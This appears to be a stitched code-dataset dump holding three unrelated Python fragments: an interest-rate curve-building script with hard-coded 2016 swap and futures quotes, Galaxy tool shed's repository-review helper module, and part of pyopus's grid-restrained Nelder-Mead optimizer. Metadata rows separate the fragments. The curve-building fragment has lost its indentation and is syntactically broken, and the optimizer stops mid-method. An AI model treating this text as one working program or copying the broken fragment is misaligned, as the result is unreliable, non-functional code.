(datetime.datetime(2020, 7, 5), 0.005600),
(datetime.datetime(2021, 7, 5), 0.006450),
(datetime.datetime(2022, 7, 5), 0.007350),
(datetime.datetime(2023, 7, 5), 0.008155),
(datetime.datetime(2026, 7, 5), 0.010262),
(datetime.datetime(2028, 7, 5), 0.011370),
(datetime.datetime(2031, 7, 5), 0.012585),
(datetime.datetime(2036, 7, 5), 0.013827),
(datetime.datetime(2041, 7, 5), 0.014470),
(datetime.datetime(2046, 7, 5), 0.014847),
(datetime.datetime(2056, 7, 5), 0.015047),
(datetime.datetime(2066, 7, 5), 0.014897)]
fedfunds.add_instrument(fedfunds_cash)
fedfunds.add_instrument(fedfunds_swap_onew)
fedfunds.add_instrument(fedfunds_swap_twow)
fedfunds.add_instrument(fedfunds_swap_threew)
for (maturity, rate, months) in fedfunds_short_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds,
fixed_length=months,
float_length=months,
**fedfunds_short_conventions)
fedfunds.add_instrument(inst)
for (maturity, rate) in fedfunds_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds,
**fedfunds_conventions)
fedfunds.add_instrument(inst)
# EUR EURIBOR 6M curve (6/30/2016 data, 6/30/2016 effective date)
euribor = qb.LIBORCurve(curve_effective, discount_curve=eonia)
effective = datetime.datetime(2016, 7, 4)
euribor_short_conventions = {'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'fixed_basis': '30E360'}
euribor_conventions = {'fixed_length': 12,
'float_length': 6,
'fixed_basis': '30E360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_period': 6,
'rate_period_length': 'months'}
euribor_cash_instruments = [(1, 'weeks', -0.00371),
(2, 'weeks', -0.00370),
(1, 'months', -0.00364),
(2, 'months', -0.00321),
(3, 'months', -0.00286),
(6, 'months', -0.00179)]
euribor_fra_instruments = [(datetime.datetime(2017, 1, 4), datetime.datetime(2017, 7, 4), -0.00210),
(datetime.datetime(2017, 7, 4), datetime.datetime(2018, 1, 4), -0.00222)]
euribor_swap_instruments = [(datetime.datetime(2018, 7, 4), -0.002075),
(datetime.datetime(2019, 7, 4), -0.001979),
(datetime.datetime(2020, 7, 4), -0.001421),
(datetime.datetime(2021, 7, 4), -0.000539),
(datetime.datetime(2022, 7, 4), 0.000166),
(datetime.datetime(2023, 7, 4), 0.001454),
(datetime.datetime(2024, 7, 4), 0.002476),
(datetime.datetime(2025, 7, 4), 0.003498),
(datetime.datetime(2026, 7, 4), 0.004424),
(datetime.datetime(2027, 7, 4), 0.005268),
(datetime.datetime(2028, 7, 4), 0.005954),
(datetime.datetime(2031, 7, 4), 0.007514),
(datetime.datetime(2036, 7, 4), 0.008604),
(datetime.datetime(2041, 7, 4), 0.008824),
(datetime.datetime(2046, 7, 4), 0.008754),
(datetime.datetime(2051, 7, 4), 0.008694),
(datetime.datetime(2056, 7, 4), 0.008582),
(datetime.datetime(2061, 7, 4), 0.008281),
(datetime.datetime(2066, 7, 4), 0.008054)]
for (length, length_type, rate) in euribor_cash_instruments:
inst = qb.LIBORInstrument(effective,
rate,
length,
euribor,
length_type=length_type,
payment_adjustment='following')
euribor.add_instrument(inst)
for (start_date, end_date, rate) in euribor_fra_instruments:
inst = qb.FRAInstrumentByDates(start_date, end_date, rate, euribor)
euribor.add_instrument(inst)
for (maturity, rate) in euribor_swap_instruments:
inst = qb.LIBORSwapInstrument(effective,
maturity,
rate,
euribor,
**euribor_conventions)
euribor.add_instrument(inst)
# USD LIBOR 3M curve (6/30/2016 data)
usdlibor = qb.LIBORCurve(curve_effective, discount_curve=fedfunds)
effective = datetime.datetime(2016, 7, 5)
usdlibor_conventions = {'fixed_length': 6,
'float_length': 3,
'fixed_basis': '30360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_period': 3,
'rate_period_length': 'months'}
usdlibor_cash_instruments = [(1, 'weeks', 0.004402),
(1, 'months', 0.004651),
(2, 'months', 0.005490),
(3, 'months', 0.006541)]
usdlibor_futures_instruments = [(datetime.datetime(2016, 9, 21), datetime.datetime(2016, 12, 21), 99.35562),
(datetime.datetime(2016, 12, 21),
datetime.datetime(2017, 3, 21), 99.32671),
(datetime.datetime(2017, 3, 15),
datetime.datetime(2017, 6, 15), 99.30839),
(datetime.datetime(2017, 6, 21),
datetime.datetime(2017, 9, 21), 99.27554),
(datetime.datetime(2017, 9, 20),
datetime.datetime(2017, 12, 20), 99.23812),
(datetime.datetime(2017, 12, 20),
datetime.datetime(2018, 3, 20), 99.18614),
(datetime.datetime(2018, 3, 21),
datetime.datetime(2018, 6, 21), 99.14960),
(datetime.datetime(2018, 6, 20),
datetime.datetime(2018, 9, 20), 99.10847),
(datetime.datetime(2018, 9, 19),
datetime.datetime(2018, 12, 19), 99.06277),
(datetime.datetime(2018, 12, 19),
datetime.datetime(2019, 3, 19), 99.00748),
(datetime.datetime(2019, 3, 20),
datetime.datetime(2019, 6, 20), 98.96757),
(datetime.datetime(2019, 6, 19), datetime.datetime(2019, 9, 19), 98.92307)]
usdlibor_swap_instruments = [(datetime.datetime(2020, 7, 5), 0.00898),
(datetime.datetime(2021, 7, 5), 0.00985),
(datetime.datetime(2022, 7, 5), 0.01075),
(datetime.datetime(2023, 7, 5), 0.01158),
(datetime.datetime(2024, 7, 5), 0.01241),
(datetime.datetime(2025, 7, 5), 0.01311),
(datetime.datetime(2026, 7, 5), 0.01375),
(datetime.datetime(2027, 7, 5), 0.01435),
(datetime.datetime(2028, 7, 5), 0.01487),
(datetime.datetime(2031, 7, 5), 0.01611),
(datetime.datetime(2036, 7, 5), 0.01739),
(datetime.datetime(2041, 7, 5), 0.01807),
(datetime.datetime(2046, 7, 5), 0.01846),
(datetime.datetime(2056, 7, 5), 0.01866),
(datetime.datetime(2066, 7, 5), 0.01851)]
for (length, length_type, rate) in usdlibor_cash_instruments:
inst = qb.LIBORInstrument(effective,
rate,
length,
usdlibor,
length_type=length_type,
payment_adjustment='following')
usdlibor.add_instrument(inst)
for (start_date, end_date, price) in usdlibor_futures_instruments:
inst = qb.FuturesInstrumentByDates(start_date, end_date, price, usdlibor)
usdlibor.add_instrument(inst)
for (maturity, rate) in usdlibor_swap_instruments:
inst = qb.LIBORSwapInstrument(effective,
maturity,
rate,
usdlibor,
**usdlibor_conventions)
usdlibor.add_instrument(inst)
# GBP OIS curve (6/30/2016 data, 6/30/2016 effective date)
sonia = qb.Curve(curve_effective)
sonia_short_conventions = {'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_basis': 'Act365',
'fixed_basis': 'Act365',
'float_basis': 'Act365'
}
sonia_conventions = {'fixed_length': 12,
'float_length': 12,
'fixed_basis': 'Act360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_basis': 'Act365',
'fixed_basis': 'Act365',
'float_basis': 'Act365'
}
sonia_cash = qb.LIBORInstrument(curve_effective,
0.004416,
1,
sonia,
length_type='days',
payment_adjustment='following')
sonia_swap_onew = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 7),
0.00443,
sonia,
fixed_length=1,
float_length=1,
fixed_period_length='weeks',
float_period_length='weeks',
**sonia_short_conventions)
sonia_swap_twow = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 14),
0.00448,
sonia,
fixed_length=2,
float_length=2,
fixed_period_length='weeks',
float_period_length='weeks',
**sonia_short_conventions)
sonia_swap_threew = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 21),
0.004042,
sonia,
fixed_length=3,
float_length=3,
fixed_period_length='weeks',
float_period_length='weeks',
**sonia_short_conventions)
sonia_swap_onem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 29),
0.0038,
sonia,
fixed_length=1,
float_length=1,
**sonia_short_conventions)
sonia_swap_twom = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 8, 31),
0.003017,
sonia,
fixed_length=2,
float_length=2,
**sonia_short_conventions)
sonia_swap_threem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 9, 30),
0.002653,
sonia,
fixed_length=3,
float_length=3,
**sonia_short_conventions)
sonia_swap_fourm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 10, 31),
0.002425,
sonia,
fixed_length=4,
float_length=4,
**sonia_short_conventions)
sonia_swap_fivem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 11, 30),
0.002213,
sonia,
fixed_length=5,
float_length=5,
**sonia_short_conventions)
sonia_swap_sixm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 12, 30),
0.002053,
sonia,
fixed_length=6,
float_length=6,
**sonia_short_conventions)
sonia_swap_sevenm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 1, 31),
0.001925,
sonia,
fixed_length=7,
float_length=7,
**sonia_short_conventions)
sonia_swap_eightm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 2, 28),
0.001812,
sonia,
fixed_length=8,
float_length=8,
**sonia_short_conventions)
sonia_swap_ninem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 3, 31),
0.001716,
sonia,
fixed_length=9,
float_length=9,
**sonia_short_conventions)
sonia_swap_tenm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 4, 28),
0.00164,
sonia,
fixed_length=10,
float_length=10,
**sonia_short_conventions)
sonia_swap_elevenm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 5, 31),
0.001564,
sonia,
fixed_length=11,
float_length=11,
**sonia_short_conventions)
sonia_short_swaps = [sonia_cash, sonia_swap_onew, sonia_swap_twow,
sonia_swap_threew, sonia_swap_onem, sonia_swap_twom,
sonia_swap_threem, sonia_swap_fourm, sonia_swap_fivem,
sonia_swap_sixm, sonia_swap_sevenm, sonia_swap_eightm,
sonia_swap_ninem, sonia_swap_tenm, sonia_swap_elevenm]
sonia_swap_data = [(datetime.datetime(2017, 6, 30), 0.001499),
(datetime.datetime(2017, 12, 29), 0.001223),
(datetime.datetime(2018, 6, 30), 0.001076),
(datetime.datetime(2019, 6, 30), 0.001106),
(datetime.datetime(2020, 6, 30), 0.001444),
(datetime.datetime(2021, 6, 30), 0.002058),
(datetime.datetime(2022, 6, 30), 0.00284),
(datetime.datetime(2023, 6, 30), 0.003749),
(datetime.datetime(2024, 6, 30), 0.004668),
(datetime.datetime(2025, 6, 30), 0.005532),
(datetime.datetime(2026, 6, 30), 0.006322),
(datetime.datetime(2027, 6, 30), 0.007016),
(datetime.datetime(2028, 6, 30), 0.007609),
(datetime.datetime(2031, 6, 30), 0.008891),
(datetime.datetime(2036, 6, 30), 0.009792),
(datetime.datetime(2041, 6, 30), 0.009916),
(datetime.datetime(2046, 6, 30), 0.009869),
(datetime.datetime(2056, 6, 30), 0.009242),
(datetime.datetime(2066, 6, 30), 0.009003)]
for inst in sonia_short_swaps:
sonia.add_instrument(inst)
for maturity, rate in sonia_swap_data:
sonia.add_instrument(qb.OISSwapInstrument(curve_effective,
maturity,
rate,
sonia,
**sonia_conventions))
fedfunds_short = qb.Curve(curve_effective)
fedfunds_short_short_instruments = [
fedfunds_cash,
fedfunds_swap_onew,
fedfunds_swap_twow,
fedfunds_swap_threew]
for inst in fedfunds_short_short_instruments:
new_inst = copy.deepcopy(inst)
new_inst.curve = fedfunds_short
fedfunds_short.add_instrument(new_inst)
for (maturity, rate, months) in fedfunds_short_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds_short,
fixed_length=months,
float_length=months,
**fedfunds_short_conventions)
fedfunds_short.add_instrument(inst)
for (maturity, rate) in fedfunds_instruments[:6]:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds_short,
**fedfunds_conventions)
fedfunds_short.add_instrument(inst)
usdlibor_short = qb.LIBORCurve(curve_effective, discount_curve=fedfunds_short)
for (length, length_type, rate) in usdlibor_cash_instruments:
inst = qb.LIBORInstrument(effective,
rate,
length,
usdlibor_short,
length_type=length_type,
payment_adjustment='following')
usdlibor_short.add_instrument(inst)
for (start_date, end_date, price) in usdlibor_futures_instruments:
inst = qb.FuturesInstrumentByDates(start_date, end_date, price, usdlibor_short)
usdlibor_short.add_instrument(inst)
for (maturity, rate) in usdlibor_swap_instruments[:2]:
inst = qb.LIBORSwapInstrument(effective,
maturity,
rate,
usdlibor_short,
**usdlibor_conventions)
usdlibor_short.add_instrument(inst)
fedfunds_libor_libor_swaps = usdlibor_swap_instruments[2:4]
fedfunds_libor_libor_swaps.extend([usdlibor_swap_instruments[6]])
fedfunds_libor_libor_swaps.extend(usdlibor_swap_instruments[8:])
fedfunds_libor = qb.SimultaneousStrippedCurve(curve_effective,
fedfunds_short,
usdlibor_short)
fedfunds_libor_swap_data = [(datetime.datetime(2022, 7, 5), 0.003400),
(datetime.datetime(2023, 7, 5), 0.003425),
(datetime.datetime(2026, 7, 5), 0.003488),
(datetime.datetime(2028, 7, 5), 0.003500),
(datetime.datetime(2031, 7, 5), 0.003525),
(datetime.datetime(2036, 7, 5), 0.003563),
(datetime.datetime(2041, 7, 5), 0.003600),
(datetime.datetime(2046, 7, 5), 0.003613),
(datetime.datetime(2056, 7, 5), 0.003613),
(datetime.datetime(2066, 7, 5), 0.003613)]
for idx, (maturity, rate) in enumerate(fedfunds_libor_swap_data):
ois_inst = qb.AverageIndexBasisSwapInstrument(effective,
maturity,
fedfunds_libor,
leg_one_spread=rate)
libor_inst = qb.LIBORSwapInstrument(effective,
fedfunds_libor_libor_swaps[idx][0],
fedfunds_libor_libor_swaps[idx][1],
usdlibor,
**usdlibor_conventions)
instrument_pair = qb.SimultaneousInstrument(ois_inst,
libor_inst,
fedfunds_libor)
fedfunds_libor.add_instrument(instrument_pair)
# eonia.build()
# eonia.view()
# eonia.zeros()
# fedfunds.build()
# fedfunds.view()
# fedfunds.zeros()
# sonia.build()
# sonia.view()
# sonia.zeros()
# euribor.build()
# euribor.view()
# euribor.zeros()
# usdlibor.build()
# usdlibor.view()
# usdlibor.zeros()
# fedfunds_libor.build()
# fedfunds_libor.discount_curve.view()
# fedfunds_libor.discount_curve.zeros()
# fedfunds_libor.projection_curve.view()
# fedfunds_libor.projection_curve.zeros()
| mit | -2,291,508,215,302,603,800 | 50.164013 | 109 | 0.431826 | false | 4.223873 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/tool_shed/util/review_util.py | 1 | 6281 | import logging
import os
from galaxy.model.orm import and_
from galaxy.util.odict import odict
from tool_shed.util import hg_util
import tool_shed.util.shed_util_common as suc
log = logging.getLogger( __name__ )
def can_browse_repository_reviews( app, user, repository ):
"""
Determine if there are any reviews of the received repository for which the
current user has permission to browse any component reviews.
"""
if user:
for review in repository.reviews:
for component_review in review.component_reviews:
if app.security_agent.user_can_browse_component_review( app,
repository,
component_review, user ):
return True
return False
def changeset_revision_reviewed_by_user( user, repository, changeset_revision ):
"""Determine if the current changeset revision has been reviewed by the current user."""
for review in repository.reviews:
if review.changeset_revision == changeset_revision and review.user == user:
return True
return False
def get_component( app, id ):
"""Get a component from the database."""
sa_session = app.model.context.current
return sa_session.query( app.model.Component ).get( app.security.decode_id( id ) )
def get_component_review( app, id ):
"""Get a component_review from the database"""
sa_session = app.model.context.current
return sa_session.query( app.model.ComponentReview ).get( app.security.decode_id( id ) )
def get_component_by_name( app, name ):
"""Get a component from the database via a name."""
sa_session = app.model.context.current
return sa_session.query( app.model.Component ) \
.filter( app.model.Component.table.c.name==name ) \
.first()
def get_component_review_by_repository_review_id_component_id( app, repository_review_id, component_id ):
"""Get a component_review from the database via repository_review_id and component_id."""
sa_session = app.model.context.current
return sa_session.query( app.model.ComponentReview ) \
.filter( and_( app.model.ComponentReview.table.c.repository_review_id == app.security.decode_id( repository_review_id ),
app.model.ComponentReview.table.c.component_id == app.security.decode_id( component_id ) ) ) \
.first()
def get_components( app ):
sa_session = app.model.context.current
return sa_session.query( app.model.Component ) \
.order_by( app.model.Component.name ) \
.all()
def get_previous_repository_reviews( app, repository, changeset_revision ):
"""
Return an ordered dictionary of repository reviews up to and including the
received changeset revision.
"""
repo = hg_util.get_repo_for_repository( app, repository=repository, repo_path=None, create=False )
reviewed_revision_hashes = [ review.changeset_revision for review in repository.reviews ]
previous_reviews_dict = odict()
for changeset in hg_util.reversed_upper_bounded_changelog( repo, changeset_revision ):
previous_changeset_revision = str( repo.changectx( changeset ) )
if previous_changeset_revision in reviewed_revision_hashes:
previous_rev, previous_changeset_revision_label = \
hg_util.get_rev_label_from_changeset_revision( repo, previous_changeset_revision )
revision_reviews = get_reviews_by_repository_id_changeset_revision( app,
app.security.encode_id( repository.id ),
previous_changeset_revision )
previous_reviews_dict[ previous_changeset_revision ] = \
dict( changeset_revision_label=previous_changeset_revision_label,
reviews=revision_reviews )
return previous_reviews_dict
def get_review( app, id ):
"""Get a repository_review from the database via id."""
sa_session = app.model.context.current
return sa_session.query( app.model.RepositoryReview ).get( app.security.decode_id( id ) )
def get_review_by_repository_id_changeset_revision_user_id( app, repository_id, changeset_revision, user_id ):
"""
Get a repository_review from the database via repository id, changeset_revision
and user_id.
"""
sa_session = app.model.context.current
return sa_session.query( app.model.RepositoryReview ) \
.filter( and_( app.model.RepositoryReview.repository_id == app.security.decode_id( repository_id ),
app.model.RepositoryReview.changeset_revision == changeset_revision,
app.model.RepositoryReview.user_id == app.security.decode_id( user_id ) ) ) \
.first()
def get_reviews_by_repository_id_changeset_revision( app, repository_id, changeset_revision ):
"""Get all repository_reviews from the database via repository id and changeset_revision."""
sa_session = app.model.context.current
return sa_session.query( app.model.RepositoryReview ) \
.filter( and_( app.model.RepositoryReview.repository_id == app.security.decode_id( repository_id ),
app.model.RepositoryReview.changeset_revision == changeset_revision ) ) \
.all()
def has_previous_repository_reviews( app, repository, changeset_revision ):
"""
Determine if a repository has a changeset revision review prior to the
received changeset revision.
"""
repo = hg_util.get_repo_for_repository( app, repository=repository, repo_path=None, create=False )
reviewed_revision_hashes = [ review.changeset_revision for review in repository.reviews ]
for changeset in hg_util.reversed_upper_bounded_changelog( repo, changeset_revision ):
previous_changeset_revision = str( repo.changectx( changeset ) )
if previous_changeset_revision in reviewed_revision_hashes:
return True
return False
| gpl-3.0 | 8,977,158,116,913,160,000 | 51.781513 | 141 | 0.640981 | false | 4.32278 | false | false | false |
blorgon9000/pyopus | pyopus/optimizer/grnm.py | 1 | 19001 | # -*- coding: UTF-8 -*-
"""
.. inheritance-diagram:: pyopus.optimizer.grnm
:parts: 1
**Unconstrained grid-restrained Nelder-Mead simplex optimizer
(PyOPUS subsystem name: GRNMOPT)**
A provably convergent version of the Nelder-Mead simplex algorithm. The
algorithm performs unconstrained optimization. Convergence is achieved by
restraining the simplex points to a gradually refined grid and by keeping the
simplex internal angles away from 0.
The algorithm was published in
.. [grnm] Bűrmen Á., Puhan J., Tuma T.: Grid Restrained Nelder-Mead Algorithm.
Computational Optimization and Applications, vol. 34, pp. 359-375, 2006.
There is an error in Algorithm 2, step 5. The correct step 5 is:
If $f^{pe}<\min(f^{pe}, f^1, f^2, ..., f^{n+1})$ replace $x^i$ with $x^{pe}$
where $x^{i}$ denotes the point for which $f(x^i)$ is the lowest of all points.
"""
from ..misc.debug import DbgMsgOut, DbgMsg
from base import Optimizer
from nm import NelderMead
from numpy import abs, argsort, where, round, sign, diag, sqrt, log, array, zeros, dot, ones
from numpy.linalg import qr, det
import matplotlib.pyplot as pl
__all__ = [ 'GRNelderMead' ]
class GRNelderMead(NelderMead):
"""
Unconstrained grid-restrained Nelder-Mead optimizer class
Default values of the expansion (1.2) and shrink (0.25) coefficients are
different from the original Nelder-Mead values. Different are also the
values of relative tolerance (1e-16), and absolute function (1e-16) and
side length size (1e-9) tolerance.
*lam* and *Lam* are the lower and upper bound on the simplex side length
with respect to the grid. The shape (side length determinant) is bounded
with respect to the grid density by *psi*.
The grid density has a continuity bound due to the finite precision of
floating point numbers. Therefore the grid begins to behave as continuous
when its density falls below the relative(*tau_r*) and absolute (*tau_a*)
bound with respect to the grid origin.
If *originalGrid* is ``True`` the initial grid has the same density in all
directions (as in the paper). If ``False`` the initial grid density adapts
to the bounding box shape.
If *gridRestrainInitial* is ``True`` the points of the initial simplex are
restrained to the grid.
See the :class:`~pyopus.optimizer.nm.NelderMead` class for more
information.
"""
def __init__(self, function, debug=0, fstop=None, maxiter=None,
reflect=1.0, expand=1.2, outerContract=0.5, innerContract=-0.5, shrink=0.25,
reltol=1e-15, ftol=1e-15, xtol=1e-9, simplex=None,
lam=2.0, Lam=2.0**52, psi=1e-6, tau_r=2.0**(-52), tau_a=1e-100,
originalGrid=False, gridRestrainInitial=False):
NelderMead.__init__(self, function, debug, fstop, maxiter,
reflect, expand, outerContract, innerContract, shrink,
reltol, ftol, xtol, simplex)
# Simplex
self.simplex=None
# Grid origin and scaling
self.z=None
self.Delta=None
# Side length bounds wrt. grid
self.lam=lam
self.Lam=Lam
# Simplex shape lower bound
self.psi=1e-6
# Grid continuity bound (relative and absolute)
self.tau_r=tau_r
self.tau_a=tau_a
# Create initial grid with the procedure described in the paper
self.originalGrid=originalGrid
# Grid restrain initial simplex
self.gridRestrainInitial=gridRestrainInitial
def check(self):
"""
Checks the optimization algorithm's settings and raises an exception if
something is wrong.
"""
NelderMead.check(self)
if self.lam<=0:
raise Exception, DbgMsg("GRNMOPT", "lambda should be positive.")
if self.Lam<=0:
raise Exception, DbgMsg("GRNMOPT", "Lambda should be positive.")
if self.lam>self.Lam:
raise Exception, DbgMsg("GRNMOPT", "Lambda should be greater or equal lambda.")
if self.psi<0:
raise Exception, DbgMsg("GRNMOPT", "psi should be greater or equal zero.")
if self.tau_r<0 or self.tau_a<0:
raise Exception, DbgMsg("GRNMOPT", "Relative and absolute grid continuity bounds should be positive.")
def buildGrid(self, density=10.0):
"""
Generates the intial grid density for the algorithm. The grid is
determined relative to the bounding box of initial simplex sides.
*density* specifies the number of points in every grid direction that
covers the corresponding side of the bounding box.
If any side of the bounding box has zero length, the mean of all side
lengths divided by *density* is used as grid density in the
corresponding direction.
Returns the 1-dimensional array of length *ndim* holding the grid
densities.
"""
if self.debug:
DbgMsgOut("GRNMOPT", "Building initial grid for initial simplex.")
# Side vectors (to the first point)
v=self.simplex[1:,:]-self.simplex[0,:]
if not self.originalGrid:
# Maximal absolute components (bounding box sides)
vmax=abs(v).max(0)
# Maximal bounding box side
vmax_max=vmax.max()
# If any component maximum is 0, set it to vmax value
vmax=where(vmax==0.0, vmax_max, vmax)
# Bounding box dimensions divided by density
return vmax/density
else:
# Shortest side length
lmin=sqrt((v*v).sum(1).min())
# Shortest side length divided by density, uniform across all dimensions
return ones(self.ndim)*lmin/density
def gridRestrain(self, x):
"""
Returns the point on the grid that is closest to *x*.
"""
xgr=round((x-self.z)/self.delta)*self.delta+self.z
return xgr
def sortedSideVectors(self):
"""
Returns a tuple (*vsorted*, *lsorted*) where *vsorted* is an array
holding the simplex side vectors sorted by their length with longest
side first. The first index of the 2-dimensional array is the side
vector index while the second one is the component index. *lsorted*
is a 1-dimensional array of corresponding simplex side lengths.
"""
# Side vectors
v=self.simplex[1:,:]-self.simplex[0,:]
# Get length
l2=(v*v).sum(1)
# Order by length (longest first)
i=argsort(l2, 0, 'mergesort') # shortest first
i=i[-1::-1] # longest first
vsorted=v[i,:]
lsorted=sqrt(l2[i])
return (vsorted, lsorted)
def reshape(self, v=None, Q=None, R=None):
"""
Reshapes simpex side vectors given by rows of *v* into orthogonal sides
with their bounding box bounded in length by *lam* and *Lam* with
respect to the grid density. If *v* is ``None`` it assumes that it is a
product of matrices *Q* and *R*.
Returns a tuple (*vnew*, *l*) where *vnew* holds the reshaped simplex
sides and *l* is the 1-dimensional array of reshaped side lengths.
"""
# Rows are side vectors
# QR decomposition of a matrix with side vectors as columns
if v is not None:
(Q, R)=qr(v.T)
# Get scaling factors and their signs
Rdiag=R.diagonal()
Rsign=sign(Rdiag)
Rsign=where(Rsign!=0, Rsign, 1.0)
# Get side lengths
l=abs(Rdiag)
# Calculate side length bounds
norm_delta=sqrt((self.delta**2).sum())
lower=self.lam*sqrt(self.ndim)*norm_delta/2
upper=self.Lam*sqrt(self.ndim)*norm_delta/2
# Bound side length
l=where(l<=upper, l, upper)
l=where(l>=lower, l, lower)
# Scale vectors
# Vectors are in columns of Q. Therefore transpose Q.
vnew=dot(diag(l*Rsign), Q.T)
return (vnew, l)
def reset(self, x0):
"""
Puts the optimizer in its initial state and sets the initial point to
be the 1-dimensional array or list *x0*. The length of the array
becomes the dimension of the optimization problem
(:attr:`ndim` member).
The initial simplex is built around *x0* by calling the
:meth:`buildSimplex` method with default values for the *rel* and *abs*
arguments.
If *x0* is a 2-dimensional array or list of size
(*ndim*+1) times *ndim* it specifies the initial simplex.
A corresponding grid is created by calling the :meth:`buildGrid` method.
The initial value of the natural logarithm of the simplex side vectors
determinant is calculated and stored.
"""
# Debug message
if self.debug:
DbgMsgOut("GRNMOPT", "Resetting.")
# Make it an array
x0=array(x0)
# Is x0 a point or a simplex?
if x0.ndim==1:
# Point
# Set x now
NelderMead.reset(self, x0)
if self.debug:
DbgMsgOut("GRNMOPT", "Generating initial simplex from initial point.")
sim=self.buildSimplex(x0)
self._setSimplex(sim)
self.delta=self.buildGrid()
self.z=x0
else:
# Simplex or error (handled in _setSimplex())
self._setSimplex(x0)
self.delta=self.buildGrid()
self.z=x0[0,:]
if self.debug:
DbgMsgOut("GRNMOPT", "Using specified initial simplex.")
# Set x to first point in simplex after it was checked in _setSimplex()
Optimizer.reset(self, x0[0,:])
# Reset point moves counter
self.simplexmoves=zeros(self.ndim+1)
# Make x tolerance an array
self.xtol=array(self.xtol)
def run(self):
"""
Runs the optimization algorithm.
"""
# Debug message
if self.debug:
DbgMsgOut("GRNMOPT", "Starting a run at i="+str(self.niter))
# Checks
self.check()
# Reset stop flag
self.stop=False
# Grid-restrain initial simplex
if self.gridRestrainInitial:
for i in range(0, self.ndim+1):
self.simplex[i,:]=self.gridRestrain(self.simplex[i,:])
# Evaluate if needed
if self.simplexf is None:
self.simplexf=zeros(self.npts)
for i in range(0, self.ndim+1):
self.simplexf[i]=self.fun(self.simplex[i,:])
if self.debug:
DbgMsgOut("GRNMOPT", "Initial simplex point i="+str(self.niter)+": f="+str(self.simplexf[i]))
# Loop
while not self.stop:
# Order simplex (best point first)
self.orderSimplex()
# Centroid
xc=self.simplex[:-1,:].sum(0)/self.ndim
# Worst point
xw=self.simplex[-1,:]
fw=self.simplexf[-1]
# Second worst point
xsw=self.simplex[-2,:]
fsw=self.simplexf[-2]
# Best point
xb=self.simplex[0,:]
fb=self.simplexf[0]
# No shrink
shrink=False
# Reflect
xr=self.gridRestrain(xc+(xc-xw)*self.reflect)
fr=self.fun(xr)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": reflect : f="+str(fr))
if fr<fb:
# Try expansion
xe=self.gridRestrain(xc+(xc-xw)*self.expand)
fe=self.fun(xe)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": expand : f="+str(fe))
if fe<fr:
# Accept expansion
self.simplex[-1,:]=xe
self.simplexf[-1]=fe
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted expansion")
else:
# Accept reflection
self.simplex[-1,:]=xr
self.simplexf[-1]=fr
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted reflection after expansion")
elif fb<=fr and fr<fsw:
# Accept reflection
self.simplex[-1,:]=xr
self.simplexf[-1]=fr
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted reflection")
elif fsw<=fr and fr<fw:
# Try outer contraction
xo=self.gridRestrain(xc+(xc-xw)*self.outerContract)
fo=self.fun(xo)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": outer con : f="+str(fo))
if fo<fsw:
# Accept
self.simplex[-1,:]=xo
self.simplexf[-1]=fo
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted outer contraction")
else:
# Shrink
shrink=True
elif fw<=fr:
# Try inner contraction
xi=self.gridRestrain(xc+(xc-xw)*self.innerContract)
fi=self.fun(xi)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": inner con : f="+str(fi))
if fi<fsw:
# Accept
self.simplex[-1,:]=xi
self.simplexf[-1]=fi
self.simplexmoves[-1]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted inner contraction")
else:
# Shrink
shrink=True
# self._checkSimplex()
# self._plotSimplex()
# Reshape, pseudo-expand, and shrink loop
if shrink:
# Normal NM steps failed
# No reshape happened yet
reshaped=False
# Create origin vector and function value
x0=zeros(self.ndim)
f0=0.0
# Check simplex shape
# Simplex is already sorted
(v, l)=self.sortedSideVectors()
# Rows of v are side vectors, need to QR decompose a matrix
# with columns holding side vectors
(Q, R)=qr(v.T)
# Diagonal of R
Rdiag=R.diagonal()
# Grid density norm
norm_delta=sqrt((self.delta**2).sum())
if abs(Rdiag).min()<self.psi*sqrt(self.ndim)*norm_delta/2:
